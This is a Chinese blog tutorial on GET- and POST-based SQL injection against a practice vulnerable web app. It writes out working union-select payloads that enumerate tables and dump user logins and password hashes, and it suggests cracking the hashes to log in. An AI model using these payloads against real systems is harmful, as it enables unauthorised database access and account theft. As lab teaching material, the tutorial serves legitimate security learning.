SQL注入

GET 型注入攻击

将自己的环境启动起来,选择SQL Injection (GET/Search) ,然后点击hack,跳转到指定的页面,跳转到页面之后,点击查询,可以输出所有的数据:


image.png

在搜素框中,输入2‘,输出页面为错误:


image.png

在搜索框中输入‘union select 1,2 --’,输出的页面为:
image.png

从返回的提示为:字段数量不对,通过增加字段数量来进行请求,保证数据可以正常返回,
输入为:'union select 1,2,3,4,5,6,7 --',


image.png

在输入框中输入:union select 1,user(),database(),table_name,version(),6,7 from
INFORMATION_SCHEMA.tables where table_schema=database() -- ' ,最后的这个单引号前面需要留一个空格,或者使用union select 1,user(),database(),table_name,version(),6,7 from
INFORMATION_SCHEMA.tables where table_schema=database() --+'这种语句,查看输出的数据:
image.png

可以看到输出的用户名、数据库名字、数据库版本、数据表等信息,通过输出信息,需要找到用户的,应该就是users表,在输入框中输入:
union select 1,column_name,3,4,5,6,7 from
INFORMATION_SCHEMA.columns where table_name='users' --+'

可以看到输出为:


image.png

可以看到users这个表中的字段,选择id,login,password作为输出的信息,填写信息如下:
union select 1,id,login,password,5,6,7 from users --+'
image.png

可以通过反向解析(md5),来把密码解析,将密码解析出来。在解析出密码之后,尝试登录,看是否拿到用户的账号信息。

POST 型注入攻击

选择SQL Injection (POST/Select) ,进入页面,打开Burp Suite,可以根据自己的电脑,选择相应的版本进行下载,需要进行设置:


image.png

设置完成之后,打开web页面:


image.png

在浏览器中输入地址,跳转到指定页面,开始监听请求:
image.png

将请求参数转到repeater模块,然后进行验证是否有漏洞,在参数中,输入movie=1'&action=go,通过返回的数据为sql的异常提示,表示存在漏洞,可以进行尝试攻击:


image.png

修改请求参数之后,输入的内容:movie=1 union select 1,2,3,4,5,6,7 from information_schema.tables -- &action=go,可以看到返回是否正确:
image.png

输入sql语句,查询表的相关信息:
image.png

通过输入下面的语句movie=11 union select 1,group_concat(table_name separator ';'),3,4,5,6,7 from information_schema.tables where table_schema=database() -- &action=go,可以返回所有的数据表信息:
image.png

通过返回的表信息,也识别到用户应该是存储在users表里面,做下面的尝试,

movie=11 union select 1,group_concat(id separator ';'),group_concat(login separator ';'),group_concat(password separator ';'),5,6,7 from users -- &action=go


image.png

可以将返回的用户名和密码进行解密,然后验证登录。
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 首发地址:我的个人博客 前言 本文章产生的缘由是因为专业老师,让我给本专业的同学讲一哈SQL注入和XSS入门,也就...
    简言之_阅读 1,189评论 0 7
  • 在我们测试用到的时候,经常会使用到一些语法,应该透彻理解透彻这些函数1)order byb 用于根据指定的列对。语...
    二潘阅读 1,294评论 0 3
  • 写在开头,这是第一次尝试进行SQL注入,第一次写笔记,排版稍微有些混乱,同时对SQL注入的理解也不深,小白级别,望...
    feng_hacker阅读 429评论 0 1
  • Web安全之SQL注入漏洞 本节知识点 SQL注入原理 前言 结构化查询语句(Structured Query L...
    f354f7231c35阅读 2,085评论 0 5
  • 一、sql注入原理 SQL 注入就是指 web 应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是...
    卿酌南烛_b805阅读 4,202评论 0 2